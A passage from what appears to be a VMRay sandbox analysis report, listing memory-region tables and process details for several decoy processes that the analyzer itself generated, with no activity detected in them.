| pagefile_0x0000000000910000 | 0x00910000 | 0x00a90fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000aa0000 | 0x00aa0000 | 0x01e9ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001ea0000 | 0x01ea0000 | 0x01f57fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001f60000 | 0x01f60000 | 0x0205ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002060000 | 0x02060000 | 0x0206ffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x74610000 | 0x7462cfff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x74630000 | 0x746a4fff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x746b0000 | 0x74740fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f3e0000 | 0x7f3e0000 | 0x7f4dffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f4e0000 | 0x7f4e0000 | 0x7f502fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f504000 | 0x7f504000 | 0x7f506fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f50a000 | 0x7f50a000 | 0x7f50afff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f50c000 | 0x7f50c000 | 0x7f50cfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f50d000 | 0x7f50d000 | 0x7f50ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc57b4ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #71: shift.exe
0
0
| Information | Value |
|---|---|
| ID | #71 |
| File Name | c:\program files (x86)\mozilla firefox\shift.exe |
| Command Line | "C:\Program Files (x86)\Mozilla Firefox\shift.exe" |
| Initial Working Directory | C:\Program Files (x86)\Mozilla Firefox\ |
| Monitor | Start Time: 00:02:03, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:59 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x1f4 |
| Parent PID | 0x57c (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
DB4
0x
200
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000af0000 | 0x00af0000 | 0x00afffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000b00000 | 0x00b00000 | 0x00b03fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000b10000 | 0x00b10000 | 0x00b10fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000b20000 | 0x00b20000 | 0x00b33fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000b40000 | 0x00b40000 | 0x00b7ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000b80000 | 0x00b80000 | 0x00b83fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000b90000 | 0x00b90000 | 0x00b90fff | Pagefile Backed Memory | r |
|
|
|
- |
| shift.exe | 0x00ba0000 | 0x00bb6fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000bc0000 | 0x00bc0000 | 0x00cbffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000cc0000 | 0x00cc0000 | 0x00cc1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00cd0000 | 0x00d8dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000d90000 | 0x00d90000 | 0x00d90fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000da0000 | 0x00da0000 | 0x00da3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000dc0000 | 0x00dc0000 | 0x00dcffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000f40000 | 0x00f40000 | 0x0103ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001040000 | 0x01040000 | 0x011c7fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001200000 | 0x01200000 | 0x0120ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001210000 | 0x01210000 | 0x01390fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000013a0000 | 0x013a0000 | 0x0279ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000027a0000 | 0x027a0000 | 0x02857fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002860000 | 0x02860000 | 0x0289ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002930000 | 0x02930000 | 0x0293ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002940000 | 0x02940000 | 0x02a3ffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x74610000 | 0x7462cfff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x74630000 | 0x746a4fff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x746b0000 | 0x74740fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f100000 | 0x7f100000 | 0x7f1fffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f200000 | 0x7f200000 | 0x7f222fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f225000 | 0x7f225000 | 0x7f227fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f22b000 | 0x7f22b000 | 0x7f22bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f22c000 | 0x7f22c000 | 0x7f22efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f22f000 | 0x7f22f000 | 0x7f22ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc57b4ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #72: unsubscribe-wisdom.exe
0
0
| Information | Value |
|---|---|
| ID | #72 |
| File Name | c:\program files\microsoft office\unsubscribe-wisdom.exe |
| Command Line | "C:\Program Files\Microsoft Office\unsubscribe-wisdom.exe" |
| Initial Working Directory | C:\Program Files\Microsoft Office\ |
| Monitor | Start Time: 00:02:03, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:59 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x1e0 |
| Parent PID | 0x57c (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
DB0
0x
434
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x00000000007b0000 | 0x007b0000 | 0x007bffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000007c0000 | 0x007c0000 | 0x007c3fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000007d0000 | 0x007d0000 | 0x007d0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000007e0000 | 0x007e0000 | 0x007f3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000800000 | 0x00800000 | 0x0083ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000840000 | 0x00840000 | 0x0093ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000940000 | 0x00940000 | 0x00943fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000950000 | 0x00950000 | 0x00950fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000960000 | 0x00960000 | 0x00961fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000009b0000 | 0x009b0000 | 0x009b0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000009c0000 | 0x009c0000 | 0x00abffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000ac0000 | 0x00ac0000 | 0x00ac3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000ae0000 | 0x00ae0000 | 0x00aeffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000af0000 | 0x00af0000 | 0x00b2ffff | Private Memory | rw |
|
|
|
- |
| unsubscribe-wisdom.exe | 0x00b80000 | 0x00b96fff | Memory Mapped File | rwx |
|
|
|
- |
| locale.nls | 0x00ba0000 | 0x00c5dfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000d60000 | 0x00d60000 | 0x00ee7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000ef0000 | 0x00ef0000 | 0x00fa7fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000fc0000 | 0x00fc0000 | 0x00fcffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001040000 | 0x01040000 | 0x0104ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001050000 | 0x01050000 | 0x011d0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000011e0000 | 0x011e0000 | 0x025dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000025e0000 | 0x025e0000 | 0x026dffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x74610000 | 0x7462cfff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x74630000 | 0x746a4fff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x746b0000 | 0x74740fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007f67d000 | 0x7f67d000 | 0x7f67ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000007f680000 | 0x7f680000 | 0x7f77ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f780000 | 0x7f780000 | 0x7f7a2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f7a8000 | 0x7f7a8000 | 0x7f7aafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f7ab000 | 0x7f7ab000 | 0x7f7abfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f7ad000 | 0x7f7ad000 | 0x7f7adfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc57b4ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #73: shoe-associations.exe
0
0
| Information | Value |
|---|---|
| ID | #73 |
| File Name | c:\program files (x86)\msbuild\shoe-associations.exe |
| Command Line | "C:\Program Files (x86)\MSBuild\shoe-associations.exe" |
| Initial Working Directory | C:\Program Files (x86)\MSBuild\ |
| Monitor | Start Time: 00:02:03, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:59 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x7a0 |
| Parent PID | 0x57c (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
DAC
0x
804
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| shoe-associations.exe | 0x00320000 | 0x00336fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000720000 | 0x00720000 | 0x0072ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000730000 | 0x00730000 | 0x00733fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000740000 | 0x00740000 | 0x00740fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000750000 | 0x00750000 | 0x00763fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000770000 | 0x00770000 | 0x007affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000007b0000 | 0x007b0000 | 0x008affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000008b0000 | 0x008b0000 | 0x008b3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000008c0000 | 0x008c0000 | 0x008c0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000008d0000 | 0x008d0000 | 0x008d1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000008e0000 | 0x008e0000 | 0x008e0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000008f0000 | 0x008f0000 | 0x008fffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00900000 | 0x009bdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000a00000 | 0x00a00000 | 0x00afffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000c00000 | 0x00c00000 | 0x00d87fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000d90000 | 0x00d90000 | 0x00d93fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000da0000 | 0x00da0000 | 0x00ddffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000df0000 | 0x00df0000 | 0x00dfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000e80000 | 0x00e80000 | 0x00e8ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000e90000 | 0x00e90000 | 0x01010fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001020000 | 0x01020000 | 0x0241ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002420000 | 0x02420000 | 0x024d7fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000024e0000 | 0x024e0000 | 0x025dffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x74610000 | 0x7462cfff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x74630000 | 0x746a4fff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x746b0000 | 0x74740fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007e9f0000 | 0x7e9f0000 | 0x7eaeffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007eaf0000 | 0x7eaf0000 | 0x7eb12fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007eb14000 | 0x7eb14000 | 0x7eb16fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eb1a000 | 0x7eb1a000 | 0x7eb1afff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eb1b000 | 0x7eb1b000 | 0x7eb1bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eb1d000 | 0x7eb1d000 | 0x7eb1ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc57b4ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #74: israeli-runtime-recommendation.exe
0
0
| Information | Value |
|---|---|
| ID | #74 |
| File Name | c:\program files (x86)\adobe\israeli-runtime-recommendation.exe |
| Command Line | "C:\Program Files (x86)\Adobe\israeli-runtime-recommendation.exe" |
| Initial Working Directory | C:\Program Files (x86)\Adobe\ |
| Monitor | Start Time: 00:02:03, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:59 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x418 |
| Parent PID | 0x57c (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
DA8
0x
414
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000cb0000 | 0x00cb0000 | 0x00cbffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000cc0000 | 0x00cc0000 | 0x00cc3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000cd0000 | 0x00cd0000 | 0x00cd0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000ce0000 | 0x00ce0000 | 0x00cf3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000d00000 | 0x00d00000 | 0x00d03fff | Pagefile Backed Memory | r |
|
|
|
- |
| israeli-runtime-recommendation.exe | 0x00d10000 | 0x00d26fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000d30000 | 0x00d30000 | 0x00d6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000d70000 | 0x00d70000 | 0x00e6ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000e70000 | 0x00e70000 | 0x00e70fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000e80000 | 0x00e80000 | 0x00e81fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00e90000 | 0x00f4dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000f50000 | 0x00f50000 | 0x00f50fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000f60000 | 0x00f60000 | 0x00f6ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000fb0000 | 0x00fb0000 | 0x00fb3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000ff0000 | 0x00ff0000 | 0x010effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000011f0000 | 0x011f0000 | 0x01377fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001380000 | 0x01380000 | 0x01437fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001440000 | 0x01440000 | 0x0147ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000014f0000 | 0x014f0000 | 0x014fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001500000 | 0x01500000 | 0x01680fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001690000 | 0x01690000 | 0x02a8ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002a90000 | 0x02a90000 | 0x02b8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002c30000 | 0x02c30000 | 0x02c3ffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x74610000 | 0x7462cfff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x74630000 | 0x746a4fff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x746b0000 | 0x74740fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007e930000 | 0x7e930000 | 0x7ea2ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ea30000 | 0x7ea30000 | 0x7ea52fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ea55000 | 0x7ea55000 | 0x7ea57fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ea5b000 | 0x7ea5b000 | 0x7ea5dfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ea5e000 | 0x7ea5e000 | 0x7ea5efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ea5f000 | 0x7ea5f000 | 0x7ea5ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc57b4ffff | Private Memory | r |
|
|
|
- |
